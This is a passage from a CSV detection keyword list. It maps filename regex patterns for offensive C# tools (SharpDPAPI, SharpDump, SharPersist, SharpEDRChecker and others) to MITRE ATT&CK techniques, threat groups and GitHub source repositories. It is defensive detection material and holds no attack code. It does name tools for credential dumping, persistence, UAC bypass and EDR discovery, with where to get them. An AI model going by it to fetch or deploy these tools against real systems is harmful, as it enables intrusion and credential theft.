"*/SharpDecryptPwd2.exe*",".{0,1000}\/SharpDecryptPwd2\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10923"
"*/SharpDir.exe*",".{0,1000}\/SharpDir\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10924"
"*/SharpDir.exe*",".{0,1000}\/SharpDir\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10925"
"*/SharpDir.exe*",".{0,1000}\/SharpDir\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10926"
"*/SharpDirLister.exe*",".{0,1000}\/SharpDirLister\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10927"
"*/SharpDomainSpray.exe*",".{0,1000}\/SharpDomainSpray\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10928"
"*/SharpDomainSpray.git*",".{0,1000}\/SharpDomainSpray\.git.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","10929"
"*/SharpDoor.cs*",".{0,1000}\/SharpDoor\.cs.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","7","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","10930"
"*/SharpDoor.exe*",".{0,1000}\/SharpDoor\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10931"
"*/SharpDoor.exe*",".{0,1000}\/SharpDoor\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10932"
"*/SharpDoor.exe*",".{0,1000}\/SharpDoor\.exe.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","10933"
"*/SharpDoor.git*",".{0,1000}\/SharpDoor\.git.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","10934"
"*/SharpDoor.git*",".{0,1000}\/SharpDoor\.git.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","N/A","7","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","10935"
"*/SharpDPAPI.cna*",".{0,1000}\/SharpDPAPI\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10936"
"*/SharpDPAPI.exe*",".{0,1000}\/SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10937"
"*/SharpDPAPI.exe*",".{0,1000}\/SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10938"
"*/SharpDPAPI.exe*",".{0,1000}\/SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpDPAPI","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10939"
"*/SharpDPAPI.exe*",".{0,1000}\/SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10940"
"*/SharpDPAPI.exe*",".{0,1000}\/SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","SharpDPAPI","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpDPAPI","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10941"
"*/SharpDPAPI.git*",".{0,1000}\/SharpDPAPI\.git.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","10942"
"*/SharpDump*",".{0,1000}\/SharpDump.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","10943"
"*/SharpDump.exe*",".{0,1000}\/SharpDump\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10944"
"*/SharpDump.exe*",".{0,1000}\/SharpDump\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10945"
"*/SharpDump.exe*",".{0,1000}\/SharpDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10946"
"*/SharpDump.exe*",".{0,1000}\/SharpDump\.exe.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","1","N/A","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","10947"
"*/SharpDump.git*",".{0,1000}\/SharpDump\.git.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","1","N/A","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","10948"
"*/SharpEdge.exe*",".{0,1000}\/SharpEdge\.exe.{0,1000}","offensive_tool_keyword","SharpEdge","C# Implementation of Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on  https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/SharpEdge","1","1","N/A","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","10949"
"*/SharpEdge.git*",".{0,1000}\/SharpEdge\.git.{0,1000}","offensive_tool_keyword","SharpEdge","C# Implementation of Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on  https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/SharpEdge","1","1","N/A","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","10950"
"*/SharpEDRChecker-*.zip*",".{0,1000}\/SharpEDRChecker\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","10951"
"*/SharpEDRChecker.exe*",".{0,1000}\/SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10952"
"*/SharpEDRChecker.exe*",".{0,1000}\/SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10953"
"*/SharpEDRChecker.exe*",".{0,1000}\/SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10954"
"*/SharpEDRChecker.git*",".{0,1000}\/SharpEDRChecker\.git.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","10955"
"*/SharpEDRChecker/*",".{0,1000}\/SharpEDRChecker\/.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","10956"
"*/SharpEfsPotato*",".{0,1000}\/SharpEfsPotato.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","N/A","10","4","317","46","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z","10957"
"*/SharpElevator.exe*",".{0,1000}\/SharpElevator\.exe.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","1","N/A","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","10958"
"*/SharpElevator.git*",".{0,1000}\/SharpElevator\.git.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","1","N/A","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","10959"
"*/SharPersist.exe*",".{0,1000}\/SharPersist\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10960"
"*/SharPersist.exe*",".{0,1000}\/SharPersist\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10961"
"*/SharPersist.exe*",".{0,1000}\/SharPersist\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10962"
"*/SharPersist.git*",".{0,1000}\/SharPersist\.git.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","1","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","10963"
"*/SharpEventLog.exe*",".{0,1000}\/SharpEventLog\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10964"
"*/SharpEventLog.exe*",".{0,1000}\/SharpEventLog\.exe.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","1","N/A","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","10965"
"*/SharpEventLog.git*",".{0,1000}\/SharpEventLog\.git.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","1","N/A","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","10966"
"*/SharpEventPersist.git*",".{0,1000}\/SharpEventPersist\.git.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","10967"
"*/SharpExcelDCom.exe*",".{0,1000}\/SharpExcelDCom\.exe.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","1","N/A","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","10968"
"*/SharpExcelibur.exe*",".{0,1000}\/SharpExcelibur\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10969"
